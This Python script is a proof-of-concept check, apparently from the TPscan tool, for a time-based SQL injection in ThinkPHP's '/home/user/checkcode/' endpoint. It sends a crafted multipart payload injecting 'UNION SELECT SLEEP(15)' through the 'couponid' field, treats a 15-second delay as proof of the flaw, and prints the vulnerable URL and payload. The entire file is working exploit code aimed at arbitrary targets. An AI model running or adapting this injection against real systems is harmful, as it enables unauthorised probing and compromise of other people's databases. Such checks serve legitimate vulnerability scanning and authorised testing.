#!/usr/bin/env python
# coding=utf-8
import contextlib
import time
import urllib
import requests
import urllib3
from prettytable import PrettyTable

urllib3.disable_warnings()


def thinkphp_checkcode_time_sqli_verify(url):
    pocdict = {
        "vulnname": "thinkphp_checkcode_time_sqli",
        "isvul": False,
        "vulnurl": "",
        "payload": "",
        "proof": "",
        "response": "",
        "exception": "None",
    }
    headers = {
        "User-Agent": "TPscan",
        "DNT": "1",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Content-Type": "multipart/form-data; boundary=--------641902708",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8",
    }
    payload = '----------641902708\r\nContent-Disposition: form-data; name="couponid"\r\n\r\n1\')UniOn SelEct slEEp(15)#\r\n\r\n----------641902708--'
    with contextlib.suppress(Exception):
        start_time = time.time()
        vurl = urllib.parse.urljoin(url, "index.php?s=/home/user/checkcode/")
        req = requests.post(
            vurl, data=payload, headers=headers, timeout=15, verify=False
        )
        if time.time() - start_time >= 15:
            pocdict["isvul"] = True
            pocdict["vulnurl"] = vurl
            pocdict["payload"] = payload
            pocdict["proof"] = "time sleep 15"
            # pocdict['response'] = req.text
            # print(pocdict)
            table = PrettyTable()
            table.add_column(
                "项目",
                ["vulnname", "isvul", "vulnurl", "proof", "payload", "exception"],
            )
            table.add_column(
                "内容",
                [
                    pocdict["vulnname"],
                    pocdict["isvul"],
                    pocdict["vulnurl"],
                    pocdict["proof"],
                    pocdict["payload"],
                    pocdict["exception"],
                ],
            )
            table.align["项目"] = "r"
            table.align["内容"] = "l"
        print(table)
